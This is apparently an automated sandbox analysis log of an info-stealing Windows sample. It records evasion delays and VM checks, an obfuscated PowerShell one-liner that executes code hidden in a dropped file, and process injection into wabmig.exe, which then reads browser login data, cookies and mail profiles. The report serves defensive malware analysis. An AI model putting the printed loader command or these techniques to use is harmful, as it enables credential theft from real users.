            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -596343s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -596222s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -596094s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -595968s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -595841s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -595731s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -595622s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -595515s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -595406s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -595297s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -595178s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -595049s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -594922s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -594797s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -594687s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -594578s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -594469s >= -30000s
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C63
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402910 FindFirstFileW, 0_2_00402910
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004068B4 FindFirstFileW,FindClose, 0_2_004068B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 599890
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 599780
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 599661
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 599546
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 599437
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 599318
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 599203
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 599093
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598982
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598875
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598762
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598648
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598546
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598437
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598326
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598216
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598109
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 598000
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 597890
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 597781
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 597671
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 597562
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 597453
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 597343
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 597234
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 597116
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 597015
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 596905
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 596796
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 596680
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 596557
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 596453
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 596343
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 596222
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 596094
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 595968
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 595841
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 595731
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 595622
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 595515
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 595406
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 595297
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 595178
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 595049
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 594922
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 594797
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 594687
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 594578
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Thread delayed: delay time: 594469
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: wabmig.exe, 00000007.00000002.2683738778.0000000007808000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2683738778.000000000785F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: file.exe, 00000000.00000002.1449609091.0000000000588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\,@
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-3669
            Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-3674
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04A7D6E4 LdrInitializeThunk, 2_2_04A7D6E4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Process token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3FD0000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 94FD9C
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6FF61096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree, 0_2_6FF61096
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wabmig.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403532
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, file source: 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: Process Memory Space: wabmig.exe PID: 8168, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara match, file source: 00000007.00000002.2695880589.0000000022EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: Process Memory Space: wabmig.exe PID: 8168, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match, file source: 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: Process Memory Space: wabmig.exe PID: 8168, type: MEMORYSTR
MITRE ATT&CK Matrix (listed per tactic; a leading number gives how many signatures mapped to that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
